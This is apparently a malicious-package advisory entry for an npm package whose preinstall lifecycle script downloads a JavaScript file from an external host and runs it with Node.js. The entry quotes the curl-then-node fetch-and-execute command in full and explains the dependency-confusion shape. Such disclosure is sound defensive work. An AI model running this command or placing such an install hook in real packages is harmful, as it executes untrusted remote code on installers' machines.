MAL-2026-5645

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (215bae963612bf6e45ac8a32644e51b297c72d021048aa58a58fb0a5d0cb396d) package.json declares a preinstall lifecycle script that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On any `npm install` of this package, the installer's machine fetches an unauthenticated, unpinned, mutable JavaScript file from an external author-controlled host and immediately executes it under Node.js with the installer's user privileges, overwriting the package's own index.js. The package describes itself as 'This is our internal app for testing' but is published to the public npm registry with no library functionality — the entire install-time effect is the remote fetch-and-execute. Whatever bytes are served at https://poc.amanrawat.com/hehe.js at install time become arbitrary code running on the installer's machine. The shape is consistent with a dependency-confusion proof-of-concept or active dropper: an internal-sounding name on public npm whose sole behavior is to pull and run remote code.